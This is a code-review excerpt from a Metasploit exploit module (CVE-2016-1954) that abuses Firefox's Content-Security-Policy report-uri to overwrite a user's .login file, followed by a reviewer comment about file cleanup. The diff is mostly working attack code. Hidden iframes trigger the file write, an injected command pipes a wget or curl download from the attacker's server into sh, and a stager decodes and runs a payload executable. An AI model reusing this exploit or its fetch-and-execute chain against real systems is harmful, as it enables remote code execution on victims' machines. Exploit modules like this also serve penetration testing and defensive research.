modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb

```diff
@@ -0,0 +1,146 @@
+      },
+      'Author'         => [
+        'Nicolas Golubovic', # vuln discoverer
+        'evo'
+      ],
+      'License'     => MSF_LICENSE,
+      'Arch'           => [ARCH_CMD],
+      'Targets'        => [ ['Automatic', {}] ],
+      'Platform'      => %w{ linux osx solaris unix },
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PrependFork' => true },
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => 'Mar 8 2016',
+      'References' => [
+        ['URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-17/'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1243178'],
+        ['CVE', '2016-1954']
+      ]
+    ))
+
+    register_options([
+      OptString.new('FILES', [
+        true,
+        'List of file paths to write shell script to',
+        '/home/ubuntu/.login'
+      ]),
+      OptString.new('URIPATH', [
+        true,
+        'Path to the exploit. This needs to be "/" for space purposes.',
+        '/'
+      ])
+    ], self.class)
+
+    register_advanced_options([
+      OptBool.new('UseCurl', [
+        false,
+        'Use curl instead of wget to stage the payload.',
+        false
+      ]),
+      OptString.new('TmpDir', [
+        false,
+        'A writable temporary dir for storing the staged payload.',
+        '/tmp'
+      ])
+    ])
+  end
+
+  def exploit
+    register_file_for_cleanup(payload_path)
+    super
+  end
+
+  def on_request_uri(cli, request)
+    if request.headers['User-Agent'] =~ /(curl|wget)/i
+      print_good("Shell script request detected. Serving payload stager.")
+      send_response(cli, stager, 'Content-Type' => 'text/plain')
+    else
+      if request.qstring['file']
+        path = request.qstring['file']
+        print_status("Client loaded exploit for path #{path}.")
+        send_response(cli, per_file_html, {
+          'Content-Security-Policy' => "script-src 'self'; report-uri file://#{path}",
+          'Content-Type' => 'text/html'
+        })
+      else
+        print_status("Client loaded main page.")
+        send_response_html(cli, main_html)
+      end
+    end
+  end
+
+  def files
+    datastore['FILES'].split(/\s+|,/)
+  end
+
+  def main_html
+    css = 'style="width:0;height:0;border:0"'
+    frames = files.map { |f| "<iframe #{css} src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
+    %Q(
+      <body>#{frames.join}</body>
+    )
+  end
+
+  def per_file_html
+    # This gets stuffed in the written JSON blob without URL encoding.
+    cmd = datastore['UseCurl'] ? 'curl' : 'wget -qO-'
+    %Q(
+      <body><script>`#{cmd} #{datastore['SRVHOST']}:#{datastore['SRVPORT']}|sh`</script></body>
+    )
+  end
+
+  def stager
+    b64 = Rex::Text.encode_base64(generate_payload_exe)
+    %Q(
+      echo '#{b64}' | base64 -d > #{payload_path}
+      chmod +x #{payload_path}
+      #{files.map { |f| "rm -f #{f}" }.join("\n") }
```

Comment:
this appears to delete the .login file - do we actually need the file dropper cleanup?